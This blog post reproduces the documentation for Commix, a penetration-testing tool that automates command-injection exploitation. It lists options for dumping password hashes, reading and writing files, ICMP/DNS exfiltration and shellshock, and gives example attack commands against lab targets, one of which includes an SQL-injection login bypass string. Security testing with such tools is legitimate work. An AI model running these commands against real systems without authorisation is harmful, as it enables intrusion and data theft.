Advertisements

Commix – Automated Command Injection and Exploitation Tool

Commix (short for [comm]and [i]njection e[x]ploiter) is an automated tool that you can use to test web-based applications with the view to find bugs, errors or vulnerabilities related to command injection attacks.

By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or HTTP header.

Requirements

  • Python 2.6.x or 2.7.x
  • Linux/ Mac OS X/ Windows (experimental)


Installation

Download commix by cloning the Git repository:

git clone https://github.com/commixproject/commix.git commix
Commix comes packaged on the official repositories of the following Linux distributions so you can use the package manager to install it!

  • ArchStrike
  • BlackArch Linux
  • BackBox
  • Kali Linux
  • Parrot Security OS
  • Weakerthan Linux

Commix also comes as a plugin, on the following penetration testing frameworks:
  • TrustedSec’s Penetration Testers Framework (PTF)
  • OWASP Offensive Web Testing Framework (OWTF)
  • CTF-Tools
  • PentestBox
  • PenBox
  • Katoolin
  • Aptive’s Penetration Testing tools
  • Homebrew Tap – Pen Test Tools

Usage:

  python commix.py [option(s)]


  Options:
  -h, --help            Show help and exit.


  General:
    These options relate to general matters.


    -v VERBOSE          Verbosity level (0-4, Default: 0).

    --install           Install 'commix' to your system.

    --version           Show version number and exit.

    --update            Check for updates (apply if any) and exit.

    --output-dir=OUT..  Set custom output directory path.

    -s SESSION_FILE     Load session from a stored (.sqlite) file.

    --flush-session     Flush session files for current target.

    --ignore-session    Ignore results stored in session file.

    -t TRAFFIC_FILE     Log all HTTP traffic into a textual file.

    --batch             Never ask for user input, use the default behaviour.

    --charset=CHARSET   Force character encoding used for data retrieval.

    --check-internet    Check internet connection before assessing the target.


  Target:
    This options has to be provided, to define the target URL.


    -u URL, --url=URL   Target URL.

    --url-reload        Reload target URL after command execution.

    -l LOGFILE          Parse target from HTTP proxy log file.

    -m BULKFILE         Scan multiple targets given in a textual file.

    -r REQUESTFILE      Load HTTP request from a file.

    --crawl=CRAWLDEPTH  Crawl the website starting from the target URL (1-2,

                        Default: 0).

    -x SITEMAP_URL      Parse target(s) from remote sitemap(.xml) file.


  Request:
    These options can be used to specify how to connect to the target URL.


    -d DATA, --data=..  Data string to be sent through POST.

    --host=HOST         HTTP Host header.

    --referer=REFERER   HTTP Referer header.

    --user-agent=AGENT  HTTP User-Agent header.

    --random-agent      Use a randomly selected HTTP User-Agent header.

    --param-del=PDEL    Set character for splitting parameter values.

    --cookie=COOKIE     HTTP Cookie header.

    --cookie-del=CDEL   Set character for splitting cookie values.

    -H HEADER, --hea..  Extra header (e.g. 'X-Forwarded-For: 127.0.0.1').

    --headers=HEADERS   Extra headers (e.g. 'Accept-Language: fr\nETag: 123').

    --proxy=PROXY       Use a HTTP proxy (e.g. '127.0.0.1:8080').

    --tor               Use the Tor network.

    --tor-port=TOR_P..  Set Tor proxy port (Default: 8118).

    --tor-check         Check to see if Tor is used properly.

    --auth-url=AUTH_..  Login panel URL.

    --auth-data=AUTH..  Login parameters and data.

    --auth-type=AUTH..  HTTP authentication type (e.g. 'Basic' or 'Digest').

    --auth-cred=AUTH..  HTTP authentication credentials (e.g. 'admin:admin').

    --ignore-401        Ignore HTTP error 401 (Unauthorized).

    --force-ssl         Force usage of SSL/HTTPS.

    --ignore-redirects  Ignore redirection attempts.

    --retries=RETRIES   Retries when the connection timeouts (Default: 3).


  Enumeration:
    These options can be used to enumerate the target host.


    --all               Retrieve everything.

    --current-user      Retrieve current user name.

    --hostname          Retrieve current hostname.

    --is-root           Check if the current user have root privileges.

    --is-admin          Check if the current user have admin privileges.

    --sys-info          Retrieve system information.

    --users             Retrieve system users.

    --passwords         Retrieve system users password hashes.

    --privileges        Retrieve system users privileges.

    --ps-version        Retrieve PowerShell's version number.


  File access:
    These options can be used to access files on the target host.


    --file-read=FILE..  Read a file from the target host.

    --file-write=FIL..  Write to a file on the target host.

    --file-upload=FI..  Upload a file on the target host.

    --file-dest=FILE..  Host's absolute filepath to write and/or upload to.


  Modules:
    These options can be used increase the detection and/or injection

    capabilities.


    --icmp-exfil=IP_..  The 'ICMP exfiltration' injection module.

                        (e.g. 'ip_src=192.168.178.1,ip_dst=192.168.178.3').

    --dns-server=DNS..  The 'DNS exfiltration' injection module.

                        (Domain name used for DNS exfiltration attack).

    --shellshock        The 'shellshock' injection module.


  Injection:
    These options can be used to specify which parameters to inject and to

    provide custom injection payloads.


    -p TEST_PARAMETER   Testable parameter(s).

    --skip=SKIP_PARA..  Skip testing for given parameter(s).

    --suffix=SUFFIX     Injection payload suffix string.

    --prefix=PREFIX     Injection payload prefix string.

    --technique=TECH    Specify injection technique(s) to use.

    --skip-technique..  Specify injection technique(s) to skip.

    --maxlen=MAXLEN     Set the max length of output for time-related

                        injection techniques (Default: 10000 chars).

    --delay=DELAY       Seconds to delay between each HTTP request.

    --time-sec=TIMESEC  Seconds to delay the OS response (Default 1).

    --tmp-path=TMP_P..  Set the absolute path of web server's temp directory.

    --web-root=WEB_R..  Set the web server document root directory (e.g.

                        '/var/www').

    --alter-shell=AL..  Use an alternative os-shell (e.g. 'Python').

    --os-cmd=OS_CMD     Execute a single operating system command.

    --os=OS             Force back-end operating system (e.g. 'Windows' or

                        'Unix').

    --tamper=TAMPER     Use given script(s) for tampering injection data.

    --msf-path=MSF_P..  Set a local path where metasploit is installed.

    --backticks         Use backticks instead of "$()", for commands

                        substitution.


  Detection:
    These options can be used to customize the detection phase.


    --level=LEVEL       Level of tests to perform (1-3, Default: 1).

    --skip-calc         Skip the mathematic calculation during the detection

                        phase.

    --skip-empty        Skip testing the parameter(s) with empty value(s).

    --failed-tries=F..  Set a number of failed injection tries, in file-based

                        technique.


  Miscellaneous:
    --dependencies      Check for third-party (non-core) dependencies.

    --purge-output      Safely remove all content from output directory.

    --skip-waf          Skip heuristic detection of WAF/IPS/IDS protection.

    --mobile            Imitate smartphone through HTTP User-Agent header.

    --offline           Work in offline mode.

    --wizard            Simple wizard interface for beginner users.

    --disable-coloring  Disable console output coloring.

Examples:

root@kali:~/commix# python commix.py --url="http://192.168.178.58/DVWA-1.0.8/
vulnerabilities/exec/#" --data="ip=127.0.0.1&submit=submit" --cookie="security
=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"
  • Exploiting php-Charts 1.0 using injection payload suffix & prefix string:
root@kali:~/commix# python commix.py --url="http://192.168.178.55/php-charts_v1.0/
wizard/index.php?type=test" --prefix="'" --suffix="//"
root@kali:~/commix# python commix.py --url="http://192.168.178.46/mutillidae/
index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=
127.0.0.1" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"
  • Exploiting Persistence using ICMP exfiltration technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" 
--data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8"
  • Exploiting Persistence using an alternative (python) shell:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php"
--data="addr=127.0.0.1" --alter-shell="Python"
root@kali:~/commix# python commix.py --url="http://192.168.178.2/pingit.php" 
--data="ip=127.0.0.1E&submit=submit" --auth-url="http://192.168.178.2/
index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"
root@kali:~/commix# python commix.py --url="http://192.168.178.6:8080/phptax/
drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser"
--technique="f" --root-dir="/"
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cgi-bin/status/" 
--shellshock
root@kali:~/commix# python commix.py --url="http://192.168.2.8/commix-testbed/
scenarios/cookie/cookie(blind).php" --cookie="addr=127.0.0.1"
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/
scenarios/user-agent/ua(blind).php" --level=3
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/
scenarios/referer/referer(classic).php" --level=3
  • Exploiting Flick 2 using custom headers and base64 encoding option:
root@kali:~/commix# python commix.py --url="https://192.168.2.12/do/cmd/*" 
--headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64
root@kali:~/commix# python commix.py --url="http://192.168.2.11/commix-testbed/
scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}'
  • Exploiting SickOs 1.1 using shellshock module and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/cgi-bin/status" 
--shellshock --proxy="192.168.2.8:3128"
Advertisements

Leave a Reply

Your email address will not be published. Required fields are marked *

Advertisements
Advertisements
Advertisements
Advertisements
%d bloggers like this: